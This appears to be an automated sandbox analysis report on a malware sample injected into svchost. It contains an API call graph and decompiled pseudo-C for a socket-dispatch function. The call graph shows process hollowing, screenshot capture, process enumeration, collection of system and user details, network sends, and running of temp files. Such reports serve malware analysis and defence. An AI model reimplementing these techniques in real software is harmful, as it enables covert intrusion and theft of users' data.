1066 4c17a0 998->1066 999->1003 1043 4c16e4 999->1043 1001 4c13be 1001->1003 1038 4c15f3 1001->1038 1003->981 1003->983 1005 4c13d3 1005->1003 1006->994 1006->995 1008->968 1009->972 1011 4c1017 inet_ntoa 1010->1011 1012 4c1013 1010->1012 1011->1012 1013 4c1028 lstrcpyA socket 1011->1013 1012->975 1014 4c104c htons inet_addr connect 1013->1014 1015 4c108f 1013->1015 1014->1015 1016 4c1084 closesocket 1014->1016 1015->975 1016->1015 1017->978 1084 4c3720 lstrcpyA 1018->1084 1020 4c10c1 lstrcatA lstrcatA 1085 4c3720 lstrcpyA 1020->1085 1022 4c10e4 lstrcatA 1086 4c3720 lstrcpyA 1022->1086 1024 4c10fb lstrcatA lstrcatA lstrcatA 1087 4c3720 lstrcpyA 1024->1087 1026 4c111f lstrcatA ObtainUserAgentString lstrcatA lstrcatA 1088 4c3720 lstrcpyA 1026->1088 1028 4c1160 lstrcatA lstrcatA 1028->980 1029->992 1031 4c347a 1030->1031 1032 4c344b 1030->1032 1031->1003 1089 4c2e19 lstrlenA 1032->1089 1036 4c14a0 1035->1036 1037 4c14cc send 1036->1037 1037->1001 1039 4c1639 select 1038->1039 1040 4c1667 1039->1040 1041 4c1611 recv 1039->1041 1040->1005 1041->1040 1042 4c162a 1041->1042 1042->1039 1042->1040 1044 4c148f send 1043->1044 1045 4c16f9 1044->1045 1178 4c166c 1045->1178 1047 4c1707 1048 4c1796 closesocket 1047->1048 1049 4c1793 1047->1049 1183 4c1d41 LocalAlloc 1047->1183 1048->1003 1049->1048 1051 4c172a 1052 4c166c 2 API calls 1051->1052 1053 4c1736 1052->1053 1054 4c176d 1053->1054 1184 4c1173 1053->1184 1055 4c1d2d LocalFree 1054->1055 1055->1049 1058 4c177e 1207 4c1dc5 GetTempPathA GetTempFileNameA 1058->1207 1059 4c1751 1061 4c176f 1059->1061 1062 4c1754 1059->1062 1192 4c1e20 GetTempPathA GetTempFileNameA PathFindExtensionA 1061->1192 1062->1054 1063 4c1757 closesocket 1062->1063 1187 4c1d91 CloseHandle 1063->1187 1230 4c2ca0 1066->1230 1070 4c17bd 1251 4c1d41 LocalAlloc 1070->1251 1072 4c1d2d LocalFree 1073 4c1833 1072->1073 1074 4c1d2d LocalFree 1073->1074 1076 4c1839 closesocket 1074->1076 1075 4c17d4 1080 4c182c 1075->1080 1252 4c11d3 1075->1252 1076->1005 1079 4c1d2d LocalFree 1079->1080 1080->1072 1082 4c1d3f 1081->1082 1083 4c1d36 LocalFree 1081->1083 1082->976 1083->1082 1084->1020 1085->1022 1086->1024 1087->1026 1088->1028 1090 4c2e2f CreateThread FindCloseChangeNotification 1089->1090 1090->1031 1091 4c3051 1090->1091 1115 4c1d41 LocalAlloc 1091->1115 1093 4c3070 1116 4c1d41 LocalAlloc 1093->1116 1095 4c307b 1117 4c2f35 1095->1117 1097 4c30ea select 1099 4c3112 WSAGetLastError 1097->1099 1110 4c3087 1097->1110 1098 4c323b Sleep 1098->1110 1100 4c3256 closesocket 1099->1100 1099->1110 1101 4c3277 SetEvent CloseHandle 1100->1101 1101->1101 1102 4c328f 1101->1102 1103 4c3295 SetEvent CloseHandle 1102->1103 1103->1103 1104 4c32af 1103->1104 1106 4c32b4 closesocket 1104->1106 1105 4c3163 SetEvent 1105->1110 1106->1106 1107 4c32c9 Sleep 1106->1107 1108 4c1d2d LocalFree 1107->1108 1112 4c32da 1108->1112 1109 4c318d Sleep 1109->1110 1110->1097 1110->1098 1110->1100 1110->1105 1110->1109 1111 4c31cb SetEvent 1110->1111 1111->1110 1113 4c1d2d LocalFree 1112->1113 1114 4c32e2 1113->1114 1115->1093 1116->1095 1118 4c2f4d 1117->1118 1119 4c2f70 CreateEventA CreateThread CloseHandle 1118->1119 1119->1119 1120 4c2fa2 1119->1120 1123 4c347c WaitForSingleObject 1119->1123 1121 4c2fa7 CreateEventA CreateThread CloseHandle 1120->1121 1121->1121 1122 4c2fd5 InitializeCriticalSection 1121->1122 1136 4c3621 WaitForSingleObject 1121->1136 1122->1110 1124 4c3497 1123->1124 1133 4c360f 1123->1133 1125 4c351e InterlockedExchange 1124->1125 1126 4c300c recv 1124->1126 1128 4c357b send 1124->1128 1130 4c35af InterlockedCompareExchange 1124->1130 1131 4c35e9 ResetEvent WaitForSingleObject 1124->1131 1132 4c35c9 Sleep 1124->1132 1124->1133 1135 4c35db SetEvent 1124->1135 1143 4c32f4 1124->1143 1157 4c2d80 1124->1157 1125->1124 1127 4c3543 ResetEvent WaitForSingleObject 1125->1127 1126->1124 1127->1124 1127->1133 1128->1124 1128->1130 1130->1124 1130->1131 1131->1124 1131->1133 1132->1124 1135->1131 1137 4c36a6 1136->1137 1139 4c363a 1136->1139 1139->1137 1140 4c36af 4 API calls 1139->1140 1141 4c2d80 5 API calls 1139->1141 1142 4c368c ResetEvent WaitForSingleObject 1139->1142 1174 4c300c 1139->1174 1140->1139 1141->1139 1142->1137 1142->1139 1144 4c3313 1143->1144 1146 4c330b 1143->1146 1166 4c36af EnterCriticalSection 1144->1166 1146->1144 1148 4c333c htons 1146->1148 1149 4c3351 1146->1149 1147 4c3438 1147->1124 1150 4c3397 1148->1150 1149->1150 1152 4c336a htons gethostbyname 1149->1152 1150->1144 1151 4c33ad inet_ntoa 1150->1151 1162 4c2db7 socket 1151->1162 1152->1150 1155 4c33c5 getsockname 1155->1144 1156 4c340d closesocket 1155->1156 1156->1144 1158 4c2d96 1157->1158 1159 4c2da7 closesocket 1157->1159 1160 4c36af 4 API calls 1158->1160 1159->1124 1161 4c2da4 1160->1161 1161->1159 1163 4c2e13 1162->1163 1164 4c2dd5 htons inet_addr connect 1162->1164 1163->1144 1163->1155 1164->1163 1165 4c2e09 closesocket 1164->1165 1165->1163 1172 4c2ec1 1166->1172 1169 4c36f7 1171 4c3700 send 1169->1171 1170 4c3713 LeaveCriticalSection 1170->1147 1171->1170 1173 4c2ecc send 1172->1173 1173->1169 1173->1170 1175 4c301e 1174->1175 1176 4c3023 recv 1174->1176 1175->1176 1177 4c3046 1175->1177 1176->1175 1176->1177 1177->1139 1179 4c16a8 select 1178->1179 1180 4c16d9 1179->1180 1181 4c1687 recv 1179->1181 1180->1047 1181->1180 1182 4c16a1 1181->1182 1182->1179 1182->1180 1183->1051 1185 4c2e19 lstrlenA 1184->1185 1186 4c1187 1185->1186 1186->1058 1186->1059 1188 4c1e20 20 API calls 1187->1188 1189 4c1dab 1188->1189 1190 4c1db1 Sleep 1189->1190 1191 4c1dc3 1189->1191 1190->1191 1191->1054 1212 4c3720 lstrcpyA 1192->1212 1194 4c1e75 lstrcpyA 1213 4c1c76 CreateFileA WriteFile CloseHandle 1194->1213 1196 4c1e91 1206 4c1f1e 1196->1206 1214 4c1d41 LocalAlloc 1196->1214 1198 4c1ea6 GetWindowsDirectoryA 1215 4c3720 lstrcpyA 1198->1215 1200 4c1ed1 wsprintfA 1216 4c1c26 1200->1216 1202 4c1ee1 lstrlenA 1219 4c1cbe 1202->1219 1204 4c1eff CreateThread CloseHandle 1205 4c1d2d LocalFree 1204->1205 1223 4c259b Sleep 1204->1223 1205->1206 1206->1054 1229 4c1c76 CreateFileA WriteFile CloseHandle 1207->1229 1209 4c1e0a 1210 4c1e1d 1209->1210 1211 4c1c26 CreateProcessA 1209->1211 1210->1054 1211->1210 1212->1194 1213->1196 1214->1198 1215->1200 1217 4c1c34 1216->1217 1217->1217 1218 4c1c46 CreateProcessA 1217->1218 1218->1202 1220 4c1ccb LocalAlloc 1219->1220 1221 4c1cc7 1219->1221 1222 4c1ce2 1220->1222 1221->1204 1222->1204 1224 4c25ac DeleteFileA 1223->1224 1225 4c25b9 Sleep 1224->1225 1226 4c25ca 1224->1226 1225->1224 1225->1226 1227 4c1d2d LocalFree 1226->1227 1228 4c25d2 1227->1228 1229->1209 1255 4c2bab 9 API calls 1230->1255 1233 4c17b2 1246 4c1b15 CreateToolhelp32Snapshot Process32First LocalAlloc 1233->1246 1234 4c2cbe GdiplusStartup 1234->1233 1235 4c2ce8 GdipGetImageEncodersSize 1234->1235 1236 4c2d64 GdiplusShutdown DeleteObject 1235->1236 1237 4c2d03 1235->1237 1236->1233 1264 4c1d41 LocalAlloc 1237->1264 1240 4c2d09 1241 4c2d10 GdipGetImageEncoders 1240->1241 1245 4c2d4b 1240->1245 1243 4c2d21 1241->1243 1241->1245 1242 4c1d2d LocalFree 1242->1236 1243->1245 1265 4c2ab8 GdipCreateBitmapFromHBITMAP 1243->1265 1245->1242 1247 4c1b53 lstrlenA 1246->1247 1248 4c1b9e CloseHandle 1247->1248 1249 4c1b71 1247->1249 1248->1070 1250 4c1b82 Process32Next 1249->1250 1250->1247 1250->1248 1251->1075 1253 4c2e19 lstrlenA 1252->1253 1254 4c11e7 send 1253->1254 1254->1079 1256 4c2c9b 1255->1256 1257 4c2c13 CreateCompatibleDC 1255->1257 1256->1233 1256->1234 1258 4c2c8f ReleaseDC 1257->1258 1259 4c2c20 GetWindowRect 1257->1259 1258->1256 1260 4c2c88 DeleteDC 1259->1260 1261 4c2c31 CreateCompatibleBitmap 1259->1261 1260->1258 1261->1260 1262 4c2c55 SelectObject BitBlt 1261->1262 1262->1260 1263 4c2c7b SelectObject 1262->1263 1263->1260 1264->1240 1266 4c2ba6 1265->1266 1267 4c2ad6 CreateStreamOnHGlobal 1265->1267 1266->1245 1268 4c2b9d GdipDisposeImage 1267->1268 1269 4c2aee GdipSaveImageToStream 1267->1269 1268->1266 1270 4c2b30 1269->1270 1273 4c2b81 1269->1273 1270->1273 1275 4c1d41 LocalAlloc 1270->1275 1272 4c2b4c 1272->1273 1274 4c1d2d LocalFree 1272->1274 1273->1268 1274->1273 1275->1272 1276->958 1278 4c2076 1277->1278 1279 4c209d 1278->1279 1280 4c2080 CreateThread CloseHandle 1278->1280 1281 4c20a6 Sleep 1279->1281 1280->1279 1280->1280 1282 4c20be 1281->1282 1283 4c20c6 CreateThread CloseHandle 1282->1283 1284 4c20e2 1282->1284 1283->1283 1283->1284 1285 4c24aa 1294 4c3720 lstrcpyA 1285->1294 1287 4c24bf GetModuleHandleA 1295 4c3720 lstrcpyA 1287->1295 1289 4c24d8 GetProcAddress 1296 4c3720 lstrcpyA 1289->1296 1291 4c24f5 GetProcAddress 1297 4c1849 GetSystemDirectoryA 1291->1297 1294->1287 1295->1289 1296->1291 1313 4c3720 lstrcpyA 1297->1313 1299 4c1878 PathAppendA 1314 4c1d75 1299->1314 1302 4c18cf 1316 4c1d41 LocalAlloc 1302->1316 1303 4c18c8 1305 4c18ea 1305->1303 1306 4c18fa ZwAllocateVirtualMemory 1305->1306 1307 4c191f 1306->1307 1308 4c1959 1306->1308 1311 4c193f ZwWriteVirtualMemory 1307->1311 1309 4c1d2d LocalFree 1308->1309 1310 4c1969 1309->1310 1310->1303 1312 4c1980 ZwSetContextThread ZwResumeThread 1310->1312 1311->1308 1312->1303 1313->1299 1315 4c1898 CreateProcessA 1314->1315 1315->1302 1315->1303 1316->1305 1317 4c26ba 1318 4c26d8 1317->1318 1319 4c26fe GetPEB 1318->1319 1320 4c272d 1319->1320 1321 4c14e4 1322 4c2265 lstrcpyA 1321->1322 1323 4c14fa 1322->1323 1324 4c1f95 2 API calls 1323->1324 1325 4c1503 1324->1325 1326 4c1234 146 API calls 1325->1326 1327 4c151f 1326->1327 1328 4c15eb 1327->1328 1329 4c148f send 1327->1329 1330 4c153c 1329->1330 1330->1328 1331 4c1556 send 1330->1331 1332 4c1570 1331->1332 1333 4c15e3 closesocket 1331->1333 1334 4c15f3 2 API calls 1332->1334 1333->1328 1335 4c1578 1334->1335 1336 4c1586 send 1335->1336 1336->1333 1337 4c159b 1336->1337 1338 4c15f3 2 API calls 1337->1338 1339 4c15a4 1338->1339 1340 4c15c2 send 1339->1340 1340->1333 1341 4c15d6 1340->1341 1342 4c15f3 2 API calls 1341->1342 1343 4c15e0 1342->1343 1343->1333 1344 4c00b6 1345 4c0106 gethostbyname 1344->1345 1347 4c1017 inet_ntoa 1345->1347 1348 4c1013 1345->1348 1347->1348 1349 4c1028 lstrcpyA socket 1347->1349 1350 4c104c htons inet_addr connect 1349->1350 1351 4c108f 1349->1351 1350->1351 1352 4c1084 closesocket 1350->1352 1352->1351 1353 4c26a2 1354 4c26aa 1353->1354 1355 4c26b2 1353->1355 1357 4c2672 1354->1357 1364 4c1bb1 GetTickCount 1357->1364 1359 4c2677 1365 4c20e8 1359->1365 1361 4c267c 1371 4c22dd 1361->1371 1363 4c2681 1364->1359 1374 4c3720 lstrcpyA 1365->1374 1367 4c212c GetVolumeInformationA lstrlenA 1375 4c3720 lstrcpyA 1367->1375 1369 4c2155 wsprintfA GetUserNameA GetComputerNameA 1370 4c21c5 1369->1370 1370->1361 1376 4c3720 lstrcpyA 1371->1376 1373 4c22f2 1373->1363 1374->1367 1375->1369 1376->1373

                    Callgraph

                    • Executed
                    • Not Executed
                    • Opacity -> Relevance
                    • Disassembly available
                    callgraph 0 Function_004C1849 3 Function_004C1D41 0->3 11 Function_004C1D51 0->11 19 Function_004C1AE5 0->19 23 Function_004C1D75 0->23 42 Function_004C1D2D 0->42 52 Function_004C3720 0->52 65 Function_004C19B6 0->65 1 Function_004C234A 7 Function_004C25DA 1->7 14 Function_004C206C 1->14 1->19 41 Function_004C2512 1->41 45 Function_004C1A2F 1->45 51 Function_004C1F27 1->51 1->52 58 Function_004C1BBD 1->58 2 Function_004C1DC5 24 Function_004C1C76 2->24 49 Function_004C1C26 2->49 4 Function_004C2EC1 5 Function_004C22DD 20 Function_004C1CE7 5->20 5->52 6 Function_004C2658 18 Function_004C2265 7->18 39 Function_004C1F95 7->39 63 Function_004C1234 7->63 8 Function_004C2E56 9 Function_004C1BD7 10 Function_004C3051 10->3 10->42 64 Function_004C2F35 10->64 12 Function_004C11D3 35 Function_004C2E19 12->35 13 Function_004C166C 14->58 15 Function_004C20E8 15->52 69 Function_004C37B0 15->69 16 Function_004C16E4 16->2 16->3 16->13 26 Function_004C1173 16->26 31 Function_004C148F 16->31 40 Function_004C1D91 16->40 16->42 53 Function_004C1E20 16->53 17 Function_004C14E4 17->18 27 Function_004C15F3 17->27 17->31 32 Function_004C1C05 17->32 17->39 17->58 17->63 18->11 18->52 21 Function_004C347C 21->8 22 Function_004C32F4 21->22 28 Function_004C300C 21->28 34 Function_004C2D80 21->34 22->11 46 Function_004C36AF 22->46 67 Function_004C2DB7 22->67 25 Function_004C2672 25->5 25->15 25->32 70 Function_004C1BB1 25->70 26->35 29 Function_004C008E 30 Function_004C1D0F 31->32 32->9 33 Function_004C1000 34->46 36 Function_004C259B 36->42 37 Function_004C1095 37->52 38 Function_004C1B15 38->11 39->6 43 Function_004C232D 39->43 39->52 39->58 40->53 41->52 44 Function_004C00AE 46->4 47 Function_004C24AA 47->0 47->52 48 Function_004C2BAB 50 Function_004C00A6 51->52 53->3 53->24 53->36 53->42 53->49 53->52 59 Function_004C1CBE 53->59 54 Function_004C17A0 54->3 54->11 54->12 54->38 54->42 55 Function_004C2CA0 54->55 55->3 55->42 55->48 61 Function_004C2AB8 55->61 56 Function_004C3621 56->28 56->34 56->46 57 Function_004C26A2 57->25 58->9 59->11 60 Function_004C343F 60->10 60->35 61->3 61->42 62 Function_004C26BA 68 Function_004C2AB0 62->68 63->3 63->11 63->16 63->20 63->27 63->30 63->31 63->33 63->37 63->42 63->52 63->54 63->60 64->21 64->23 64->56 66 Function_004C00B6

                    Executed Functions

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 11 4c3051-4c30a5 call 4c1d41 * 2 call 4c2f35 18 4c30ac-4c30b3 11->18 19 4c30b5-4c30c0 18->19 20 4c30c2 18->20 19->20 21 4c30c4-4c30c8 20->21 22 4c30d8-4c30e0 21->22 23 4c30ca-4c30ce 21->23 22->21 25 4c30e2-4c30e4 22->25 23->22 24 4c30d0-4c30d7 23->24 24->22 26 4c30ea-4c3110 select 25->26 27 4c323b-4c323c Sleep 25->27 28 4c3124-4c3126 26->28 29 4c3112-4c311c WSAGetLastError 26->29 30 4c3242-4c3249 27->30 34 4c312c-4c3135 28->34 35 4c3219-4c3228 28->35 31 4c3256-4c3276 closesocket 29->31 32 4c3122 29->32 30->31 33 4c324b-4c3251 30->33 37 4c3277-4c328d SetEvent CloseHandle 31->37 32->28 33->18 38 4c313b-4c3148 34->38 39 4c3231-4c3233 34->39 35->30 36 4c322a-4c322f 35->36 40 4c3236-4c3239 36->40 37->37 41 4c328f-4c3292 37->41 42 4c314a-4c314f 38->42 43 4c3197-4c3199 38->43 39->40 40->30 46 4c3295-4c32ad SetEvent CloseHandle 41->46 44 4c3151-4c3154 42->44 45 4c319b-4c319d 43->45 48 4c3156-4c315f 44->48 49 4c3163-4c317b SetEvent 44->49 50 4c319f-4c31a8 45->50 51 4c31aa-4c31b0 45->51 46->46 47 4c32af 46->47 52 4c32b4-4c32c7 closesocket 47->52 48->44 53 4c3161 48->53 54 4c3181-4c3184 49->54 50->45 50->51 55 4c31b2-4c31b7 51->55 56 4c3203-4c320c 51->56 52->52 57 4c32c9-4c32f1 Sleep call 4c1d2d * 2 52->57 53->54 59 4c31fe 54->59 60 4c3186-4c318b 54->60 61 4c31b9-4c31bc 55->61 56->38 58 4c3212-4c3214 56->58 58->39 63 4c3216 58->63 59->56 60->59 64 4c318d-4c3195 Sleep 60->64 65 4c31be-4c31c7 61->65 66 4c31cb-4c31f0 SetEvent 61->66 63->35 64->59 65->61 69 4c31c9 65->69 67 4c31f2-4c31fb 66->67 67->59 69->67
                    C-Code - Quality: 94%
                    			E004C3051(signed int _a4) {
                    				char* _v8;
                    				char* _v12;
                    				char _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				char _v28;
                    				signed int _v1052;
                    				signed int _v1056;
                    				char* _t47;
                    				signed int* _t51;
                    				signed int _t59;
                    				signed int* _t61;
                    				signed int _t62;
                    				signed int* _t64;
                    				char* _t66;
                    				signed int _t68;
                    				void* _t70;
                    				char* _t71;
                    				signed int _t73;
                    				signed int _t76;
                    				signed int* _t78;
                    				signed char _t79;
                    				signed int _t84;
                    				signed int _t88;
                    				char* _t89;
                    				char _t91;
                    				signed int _t92;
                    				intOrPtr _t93;
                    				char* _t94;
                    				void* _t100;
                    				signed int* _t102;
                    				signed int* _t104;
                    				void** _t106;
                    				void** _t107;
                    				signed int _t108;
                    				signed int _t109;
                    				void* _t110;
                    				void* _t125;
                    
                    				 *0x4c5420 = _a4; // executed
                    				_t47 = E004C1D41(0x80060); // executed
                    				_v8 = _t47;
                    				_v12 = E004C1D41(0x80060);
                    				E004C2F35(_t47, _t48); // executed
                    				_t91 = 0;
                    				 *0x4c541e = 0;
                    				_t76 = 1;
                    				 *0x4c541f = 0;
                    				_a4 = 1;
                    				_t104 = 0x4c5444;
                    				_v16 = 8;
                    				while(1) {
                    					_t84 = 0;
                    					if(_t91 == 0) {
                    						_t59 =  *0x4c5420; // 0x2c4
                    						_v1052 = _t59;
                    						_t84 = 1;
                    					}
                    					_t51 = _t104;
                    					do {
                    						if( *((char*)(_t51 - 4)) == 0) {
                    							_t92 =  *_t51;
                    							if(_t92 != 0) {
                    								 *(_t110 + _t84 * 4 - 0x418) = _t92;
                    								_t84 = _t84 + 1;
                    							}
                    						}
                    						_t51 =  &(_t51[3]);
                    					} while (_t51 < 0x4c6044);
                    					if(_t84 <= 0) {
                    						Sleep(1); // executed
                    						L42:
                    						if( *0x4c541f != 0) {
                    							L44:
                    							_push( *0x4c5420);
                    							L004C3746();
                    							 *0x4c541e = 0;
                    							_t106 = _v8 + 4;
                    							_t100 = 8;
                    							do {
                    								SetEvent( *_t106);
                    								CloseHandle( *_t106);
                    								 *_t106 =  *_t106 & 0x00000000;
                    								_t106 =  &(_t106[0x4003]);
                    								_t100 = _t100 - 1;
                    							} while (_t100 != 0);
                    							_t101 = _v12;
                    							_t107 = _v12 + 4;
                    							do {
                    								SetEvent( *_t107);
                    								CloseHandle( *_t107);
                    								 *_t107 =  *_t107 & 0x00000000;
                    								_t42 =  &_v16;
                    								 *_t42 = _v16 - 1;
                    								_t107 =  &(_t107[0x4003]);
                    							} while ( *_t42 != 0);
                    							_t78 = 0x4c5444;
                    							do {
                    								_push( *_t78);
                    								L004C3746();
                    								 *_t78 =  *_t78 & 0x00000000;
                    								_t78 =  &(_t78[3]);
                    							} while (_t78 < 0x4c6044);
                    							Sleep(0x1388);
                    							E004C1D2D(_t101);
                    							E004C1D2D(_v8);
                    							 *0x4c5420 =  *0x4c5420 & 0x00000000;
                    							return 0;
                    						}
                    						_t91 =  *0x4c541e; // 0x0
                    						continue;
                    					}
                    					_push( &_v28);
                    					_v1056 = _t84;
                    					_push(0);
                    					_push(0);
                    					_t61 =  &_v1056;
                    					_push(_t61);
                    					_push(0);
                    					_v28 = 0;
                    					_v24 = _t76;
                    					L004C376A(); // executed
                    					_t102 = _t61;
                    					if(_t102 != 0xffffffff) {
                    						L12:
                    						if(_t102 <= 0) {
                    							L37:
                    							_t76 = _t76 + 0x186a0;
                    							_a4 = _t76;
                    							if(_t76 <= 0xf4240) {
                    								goto L42;
                    							}
                    							_t76 = 0xf4240;
                    							L40:
                    							_a4 = _t76;
                    							goto L42;
                    						}
                    						_t62 = 0;
                    						_t79 = 0;
                    						_v20 = 0;
                    						if(_t102 <= 0) {
                    							L39:
                    							_t76 = 1;
                    							goto L40;
                    						} else {
                    							goto L14;
                    						}
                    						do {
                    							L14:
                    							_t93 =  *((intOrPtr*)(_t110 + _t62 * 4 - 0x418));
                    							_t125 = _t93 -  *0x4c5420; // 0x2c4
                    							if(_t125 != 0) {
                    								_t88 = 0;
                    								_t64 = _t104;
                    								while( *_t64 != _t93) {
                    									_t64 =  &(_t64[3]);
                    									_t88 = _t88 + 1;
                    									if(_t64 < 0x4c6044) {
                    										continue;
                    									}
                    									break;
                    								}
                    								if(_t88 >= 0x100) {
                    									goto L34;
                    								}
                    								_t94 = _v12;
                    								_t109 = 0;
                    								_t66 = _t94;
                    								while( *_t66 != 0) {
                    									_t109 = _t109 + 1;
                    									_t66 = _t66 + 0x1000c;
                    									if(_t109 < 8) {
                    										continue;
                    									}
                    									L32:
                    									_t70 = 1;
                    									_t79 =  >=  ? _t70 : _t79 & 0x000000ff;
                    									L33:
                    									_t104 = 0x4c5444;
                    									goto L34;
                    								}
                    								_t68 = _t109 * 0x1000c;
                    								 *(_t68 + _t94 + 8) = _t88;
                    								 *((char*)(0x4c5440 + _t88 * 0xc)) = 1;
                    								 *((char*)(_t68 + _t94)) = 1;
                    								SetEvent( *(_t68 + _t94 + 4));
                    								_t79 = 0;
                    								goto L32;
                    							}
                    							_t89 = _v8;
                    							_t108 = 0;
                    							_t71 = _t89;
                    							while( *_t71 != 0) {
                    								_t108 = _t108 + 1;
                    								_t71 = _t71 + 0x1000c;
                    								if(_t108 < 8) {
                    									continue;
                    								}
                    								L20:
                    								if(_t108 >= 8) {
                    									_t79 = 1;
                    									if(_t102 == 1) {
                    										Sleep(0xa);
                    									}
                    								}
                    								goto L33;
                    							}
                    							_t73 = _t108 * 0x1000c;
                    							 *0x4c541e = 1;
                    							 *((char*)(_t73 + _t89)) = 1;
                    							SetEvent( *(_t73 + _t89 + 4));
                    							goto L20;
                    							L34:
                    							_t62 = _v20 + 1;
                    							_v20 = _t62;
                    						} while (_t62 < _t102);
                    						if(_t79 == 0) {
                    							goto L39;
                    						}
                    						_t76 = _a4;
                    						goto L37;
                    					}
                    					L004C379A();
                    					if(_t61 != 0x2736) {
                    						goto L44;
                    					}
                    					_t102 = 0;
                    					goto L12;
                    				}
                    			}









































                    0x004c3066
                    0x004c306b
                    0x004c3073
                    0x004c307f
                    0x004c3082
                    0x004c3087
                    0x004c308e
                    0x004c3094
                    0x004c3097
                    0x004c309d
                    0x004c30a0
                    0x004c30a5
                    0x004c30ac
                    0x004c30ae
                    0x004c30b3
                    0x004c30b5
                    0x004c30ba
                    0x004c30c0
                    0x004c30c0
                    0x004c30c2
                    0x004c30c4
                    0x004c30c8
                    0x004c30ca
                    0x004c30ce
                    0x004c30d0
                    0x004c30d7
                    0x004c30d7
                    0x004c30ce
                    0x004c30d8
                    0x004c30db
                    0x004c30e4
                    0x004c323c
                    0x004c3242
                    0x004c3249
                    0x004c3256
                    0x004c3256
                    0x004c325c
                    0x004c326c
                    0x004c3273
                    0x004c3276
                    0x004c3277
                    0x004c3279
                    0x004c3281
                    0x004c3283
                    0x004c3286
                    0x004c328c
                    0x004c328c
                    0x004c328f
                    0x004c3292
                    0x004c3295
                    0x004c3297
                    0x004c329f
                    0x004c32a1
                    0x004c32a4
                    0x004c32a4
                    0x004c32a7
                    0x004c32a7
                    0x004c32af
                    0x004c32b4
                    0x004c32b4
                    0x004c32b6
                    0x004c32bb
                    0x004c32be
                    0x004c32c1
                    0x004c32ce
                    0x004c32d5
                    0x004c32dd
                    0x004c32e2
                    0x004c32f1
                    0x004c32f1
                    0x004c324b
                    0x00000000
                    0x004c324b
                    0x004c30ed
                    0x004c30ee
                    0x004c30f6
                    0x004c30f7
                    0x004c30f8
                    0x004c30fe
                    0x004c30ff
                    0x004c3100
                    0x004c3103
                    0x004c3106
                    0x004c310b
                    0x004c3110
                    0x004c3124
                    0x004c3126
                    0x004c3219
                    0x004c3219
                    0x004c321f
                    0x004c3228
                    0x00000000
                    0x00000000
                    0x004c322a
                    0x004c3236
                    0x004c3236
                    0x00000000
                    0x004c3236
                    0x004c312c
                    0x004c312e
                    0x004c3130
                    0x004c3135
                    0x004c3231
                    0x004c3233
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004c313b
                    0x004c313b
                    0x004c313b
                    0x004c3142
                    0x004c3148
                    0x004c3197
                    0x004c3199
                    0x004c319b
                    0x004c319f
                    0x004c31a2
                    0x004c31a8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004c31a8
                    0x004c31b0
                    0x00000000
                    0x00000000
                    0x004c31b2
                    0x004c31b5
                    0x004c31b7
                    0x004c31b9
                    0x004c31be
                    0x004c31bf
                    0x004c31c7
                    0x00000000
                    0x00000000
                    0x004c31f2
                    0x004c31fa
                    0x004c31fb
                    0x004c31fe
                    0x004c31fe
                    0x00000000
                    0x004c31fe
                    0x004c31cd
                    0x004c31d5
                    0x004c31dd
                    0x004c31e7
                    0x004c31ea
                    0x004c31f0
                    0x00000000
                    0x004c31f0
                    0x004c314a
                    0x004c314d
                    0x004c314f
                    0x004c3151
                    0x004c3156
                    0x004c3157
                    0x004c315f
                    0x00000000
                    0x00000000
                    0x004c3181
                    0x004c3184
                    0x004c3188
                    0x004c318b
                    0x004c318f
                    0x004c318f
                    0x004c318b
                    0x00000000
                    0x004c3184
                    0x004c3165
                    0x004c3172
                    0x004c3178
                    0x004c317b
                    0x00000000
                    0x004c3203
                    0x004c3206
                    0x004c3207
                    0x004c320a
                    0x004c3214
                    0x00000000
                    0x00000000
                    0x004c3216
                    0x00000000
                    0x004c3216
                    0x004c3112
                    0x004c311c
                    0x00000000
                    0x00000000
                    0x004c3122
                    0x00000000
                    0x004c3122

                    APIs
                      • Part of subcall function 004C1D41: LocalAlloc.KERNELBASE(00000040,?,?,004C3070,00080060), ref: 004C1D49
                      • Part of subcall function 004C2F35: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,004C3087,00000000,00000000,00080060,00080060), ref: 004C2F77
                      • Part of subcall function 004C2F35: CreateThread.KERNELBASE(00000000,00000000,Function_0000347C,?,00000000,00000000), ref: 004C2F8C
                      • Part of subcall function 004C2F35: CloseHandle.KERNEL32(00000000,?,004C3087,00000000,00000000,00080060,00080060), ref: 004C2F93
                      • Part of subcall function 004C2F35: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,004C3087,00000000,00000000,00080060,00080060), ref: 004C2FAC
                      • Part of subcall function 004C2F35: CreateThread.KERNELBASE(00000000,00000000,Function_00003621,?,00000000,00000000), ref: 004C2FBF
                      • Part of subcall function 004C2F35: CloseHandle.KERNEL32(00000000,?,004C3087,00000000,00000000,00080060,00080060), ref: 004C2FC6
                      • Part of subcall function 004C2F35: InitializeCriticalSection.KERNEL32(004C5424,?,004C3087,00000000,00000000,00080060,00080060), ref: 004C2FDA
                    • select.WS2_32(00000000,?,00000000,00000000,?), ref: 004C3106
                    • WSAGetLastError.WS2_32(00000000,?,00000000,00000000,?), ref: 004C3112
                    • SetEvent.KERNEL32(?), ref: 004C317B
                    • Sleep.KERNEL32(0000000A), ref: 004C318F
                    • SetEvent.KERNEL32(?), ref: 004C31EA
                    • Sleep.KERNELBASE(00000001), ref: 004C323C
                    • closesocket.WS2_32 ref: 004C325C
                    • SetEvent.KERNEL32(-00000004), ref: 004C3279
                    • CloseHandle.KERNEL32(-00000004), ref: 004C3281
                    • SetEvent.KERNEL32(00000000), ref: 004C3297
                    • CloseHandle.KERNEL32(00000000), ref: 004C329F
                    • closesocket.WS2_32(004C5444), ref: 004C32B6
                    • Sleep.KERNEL32(00001388,004C5444), ref: 004C32CE
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_4c0000_svchost.jbxd
                    Yara matches
                    Similarity
                    • API ID: Event$CloseCreateHandle$Sleep$Threadclosesocket$AllocCriticalErrorInitializeLastLocalSectionselect
                    • String ID: D`L$D`L
                    • API String ID: 1719279020-4203433839
                    • Opcode ID: d66088d6ec6cf0bdc646bf0f22455fa3914d869ef6e5d9bd59a7aee703ef0379
                    • Instruction ID: 514512df03c125620943c5253483665f2486479414b3b3705293231883d4c09c
